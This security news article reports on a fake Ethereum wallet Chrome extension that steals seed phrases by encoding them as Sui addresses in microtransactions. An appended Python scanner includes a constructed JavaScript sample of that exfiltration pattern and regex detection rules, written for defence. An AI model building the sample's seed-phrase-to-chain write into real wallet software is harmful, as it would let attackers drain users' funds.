Beware of Malicious Chrome Extension Masquerading as an Ethereum Wallet
What’s Happening?
Recent findings from cybersecurity experts have unveiled a deceptive Chrome extension that pretends to be a legitimate Ethereum wallet but is, in fact, a sophisticated piece of malware. Named “Safery: Ethereum Wallet,” this extension has made its way into the Chrome Web Store, claiming to be a secure solution for managing Ethereum cryptocurrency, complete with flexible settings. It was first uploaded on September 29, 2025, and received its most recent update on November 12. Alarmingly, it remains available for users to download.
The Deceptive Mechanics Behind Safery
The malicious behavior of this extension primarily revolves around the theft of users’ wallet seed phrases. Kirill Boychenko, a researcher at Socket, explained that while marketed as a straightforward Ethereum wallet, the extension discreetly integrates a backdoor to extract sensitive information. This is achieved by encoding the seed phrases into Sui addresses and then facilitating microtransactions from a wallet controlled by the threat actor.
How It Works
The malware embedded within the browser extension targets wallet mnemonic phrases. It accomplishes this by converting the seed phrases into fictitious Sui wallet addresses. Subsequently, it executes tiny transactions—0.000001 SUI—directed from a pre-set, hacker-controlled wallet.
The core strategy behind this malware is to disguise the theft of seed phrases as ostensibly ordinary blockchain transactions. Because the stolen data rides on public transactions, the attackers need no command-and-control (C2) server to retrieve it, and the exfiltration raises no immediate suspicion. Once the transaction is processed, the hackers read the recipient addresses back off the chain and decode them to recover the original seed phrases, which lets them drain the assets associated with the compromised wallets.
Security Analysis and Recommendations
In their assessment, Koi Security delineates how the extension’s operations facilitate the theft of seed phrases. By encoding these phrases into fake Sui addresses and monitoring blockchain activity, the hackers craftily siphon off funds from unwitting victims’ wallets.
To mitigate the risks posed by this fraudulent extension, cybersecurity experts recommend that users install wallet extensions only from reputable sources. Additionally, security teams should scan extensions thoroughly to identify mnemonic encoders, synthetic address generators, and any hard-coded seed phrases. Blocking extensions that write to the blockchain during wallet creation or import is also advisable.
A Growing Threat Landscape
Boychenko underscores the evolving tactics that cybercriminals employ to bypass detection: “This technique allows threat actors to switch chains and RPC endpoints effortlessly. Therefore, traditional detections that depend on domains, URLs, or specific extension IDs may not catch these threats.” He advises treating any unexpected blockchain RPC calls from a browser—especially from products that claim to be single-chain—as significant indicators of potential malicious activity.
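As an added example that is not part of this article or of any vendor's tooling, the following Python heuristic scanner implements the checks recommended above: hard-coded mnemonics, RPC hosts and JSON-RPC namespaces belonging to a chain the product does not claim to support, and on-chain writes inside the wallet import path. The sample extension source, the chain keyword table and the regexes are assumptions constructed for illustration, not the real Safery code.

```python
import re

# Constructed sample (not the real Safery source): an "Ethereum-only" wallet
# that carries a hard-coded seed phrase, talks to a Sui node, and writes
# on-chain as soon as a user imports a mnemonic.
SUSPECT_JS = r"""
const RPC = "https://eth.example-rpc.invalid";
const SUI_RPC = "https://fullnode.mainnet.sui.io:443";
const SENDER_SEED = "abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about";
async function onImport(userMnemonic) {
  const addrs = mnemonicToSuiAddresses(userMnemonic);
  for (const a of addrs) await rpc(SUI_RPC, "sui_executeTransactionBlock", a);
}
"""
# Constructed benign counterpart: import only derives a local address.
BENIGN_JS = r"""
const RPC = "https://eth.example-rpc.invalid";
async function onImport(userMnemonic) {
  return deriveAddress(userMnemonic);
}
"""

MNEMONIC_RE = re.compile(r'["\']((?:[a-z]{3,8} ){11,23}[a-z]{3,8})["\']')  # BIP-39 words are 3-8 letters
URL_RE = re.compile(r'https?://([A-Za-z0-9.\-]+)')
RPC_NS_RE = re.compile(r'\b(eth|sui|suix|unsafe)_[A-Za-z]+')  # JSON-RPC method namespaces
IMPORT_FN_RE = re.compile(r'function\s+(\w*(?:[Ii]mport|[Cc]reate|[Rr]estore)\w*)\s*\([^)]*\)\s*\{(.*?)\n\}', re.S)
WRITE_RE = re.compile(r'executeTransaction|sendTransaction|transfer', re.I)
# Chain -> (host keyword, JSON-RPC namespaces); an assumed, deliberately small table.
CHAINS = {"ethereum": ("eth", {"eth"}), "sui": ("sui", {"sui", "suix", "unsafe"})}

def scan_extension(source: str, advertised_chain: str = "ethereum") -> list[str]:
    """Return findings for extension source that claims to serve only advertised_chain."""
    findings = []
    for m in MNEMONIC_RE.finditer(source):          # hard-coded seed phrase literals
        n = len(m.group(1).split())
        if n in (12, 24):
            findings.append(f"hard-coded {n}-word mnemonic literal")
    for host in URL_RE.findall(source):             # RPC hosts of a chain the product disclaims
        for chain, (kw, _) in CHAINS.items():
            if chain != advertised_chain and kw in host:
                findings.append(f"RPC host for {chain} inside {advertised_chain}-only product: {host}")
    for ns in sorted({m.group(1) for m in RPC_NS_RE.finditer(source)}):  # foreign method namespaces
        if ns not in CHAINS[advertised_chain][1]:
            findings.append(f"JSON-RPC namespace {ns}_* does not belong to {advertised_chain}")
    for m in IMPORT_FN_RE.finditer(source):         # writes during wallet creation/import
        if WRITE_RE.search(m.group(2)):
            findings.append(f"on-chain write inside wallet import/create path: {m.group(1)}")
    return findings
```

Run `scan_extension(SUSPECT_JS)` to see all four classes of finding; the benign sample produces none. Regex-based triage like this is a first pass for review, not a substitute for reading the extension's code.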
Conclusion
As cyber threats continue to evolve, awareness and vigilance are more critical than ever. Users are encouraged to be cautious when choosing browser extensions, particularly those related to cryptocurrency, and to stay informed about the latest security advisories. By prioritizing trusted resources and maintaining a healthy skepticism towards newer or lesser-known tools, individuals can better protect themselves from sophisticated online threats.